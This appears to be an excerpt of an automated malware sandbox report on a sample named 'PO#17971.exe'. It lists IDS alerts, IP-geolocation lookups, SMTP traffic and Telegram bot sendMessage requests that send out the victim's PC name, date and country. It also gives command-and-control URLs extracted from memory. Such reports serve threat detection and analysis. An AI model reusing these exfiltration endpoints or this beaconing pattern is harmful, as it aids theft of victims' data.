Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49722 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49715 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49714 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49726 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49719 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49713 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49731 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49735 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49720 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49716 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49747 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49732 -> 104.21.96.1:443

Source: global traffic

TCP traffic: 192.168.2.5:49787 -> 208.91.199.223:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49708 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49718 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:18:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2010/01/2025%20/%2022:27:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: us2.smtp.mailhostbox.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 14:03:53 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 14:03:58 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: vbc.exe, 00000009.00000002.4513884239.00000000072FD000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006B6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: vbc.exe, 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: vbc.exe, 00000009.00000002.4513884239.00000000071C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: vbc.exe, 00000009.00000002.4513884239.00000000071C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: vbc.exe, 00000009.00000002.4513884239.00000000071C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: vbc.exe, 00000009.00000002.4513884239.00000000071C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: vbc.exe, 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: PO#17971.exe, TZRtlifudvO.exe.0.dr	String found in binary or memory: http://docs.livestreamer.io/install.html
Source: PO#17971.exe, TZRtlifudvO.exe.0.dr	String found in binary or memory: http://docs.livestreamer.io/players.html#Supported
Source: PO#17971.exe, TZRtlifudvO.exe.0.dr	String found in binary or memory: http://docs.livestreamer.io/plugin_matrix.html#Supported
Source: PO#17971.exe, 00000000.00000002.2086741217.0000000002C66000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4513884239.00000000071C1000.00000004.00000800.00020000.00000000.sdmp, TZRtlifudvO.exe, 0000000A.00000002.2130210299.0000000002411000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000009.00000002.4513884239.000000000730D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006B8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: vbc.exe, 00000009.00000002.4513884239.00000000071C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: PO#17971.exe, TZRtlifudvO.exe.0.dr	String found in binary or memory: http://wap.5184.com/NCEE_WAP/controller/examEnquiry/performExamEnquiryWithoutAuthForGZ?categoryCode=
Source: PO#17971.exe, TZRtlifudvO.exe.0.dr	String found in binary or memory: http://wap.5184.com/NCEE_WAP/controller/examEnquiry/performRecruitedEnquiryWithoutAuth?categoryCode=
Source: TZRtlifudvO.exe.0.dr	String found in binary or memory: http://wap.wirelessgz.cn/myExamWeb/wap/school/gaokao/myUniversity
Source: vbc.exe, 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4520711075.000000000848F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007CFE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007AB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: vbc.exe, 00000009.00000002.4513884239.00000000072A7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006B19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: vbc.exe, 00000009.00000002.4513884239.00000000072A7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006B19000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: vbc.exe, 00000009.00000002.4513884239.00000000072A7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006B19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: vbc.exe, 00000009.00000002.4513884239.00000000072A7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006B19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20a
Source: vbc.exe, 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4520711075.000000000848F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007CFE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007AB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: vbc.exe, 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4520711075.000000000848F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007CFE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007AB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: vbc.exe, 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4520711075.000000000848F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007CFE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007AB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: vbc.exe, 00000010.00000002.4514479372.0000000006BAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: vbc.exe, 00000009.00000002.4513884239.0000000007338000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006BA9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: vbc.exe, 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4520711075.000000000848F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007CFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: vbc.exe, 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4520711075.000000000848F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007CFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: vbc.exe, 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4520711075.000000000848F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007CFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: PO#17971.exe, TZRtlifudvO.exe.0.dr	String found in binary or memory: https://github.com/chrippa/livestreamer/
Source: PO#17971.exe, TZRtlifudvO.exe.0.dr	String found in binary or memory: https://github.com/thebiffman/livestreamer-sharp-ui
Source: vbc.exe, 00000009.00000002.4513884239.0000000007280000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4513884239.00000000072A7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4513884239.0000000007211000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006B19000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006AF0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006A80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: vbc.exe, 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4513884239.0000000007211000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006A80000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: vbc.exe, 00000010.00000002.4514479372.0000000006A80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: vbc.exe, 00000009.00000002.4513884239.000000000723B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4513884239.0000000007280000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4513884239.00000000072A7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006B19000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006AAA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006AF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: vbc.exe, 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4520711075.000000000848F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007CFE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007AB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: vbc.exe, 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4520711075.000000000848F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007CFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: vbc.exe, 00000010.00000002.4514479372.0000000006BDF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: vbc.exe, 00000009.00000002.4513884239.0000000007369000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006BDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
